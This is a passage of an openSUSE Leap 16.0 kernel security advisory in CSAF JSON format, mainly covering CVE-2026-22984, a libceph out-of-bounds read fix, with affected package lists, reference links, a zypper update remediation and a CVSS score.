"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22982"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
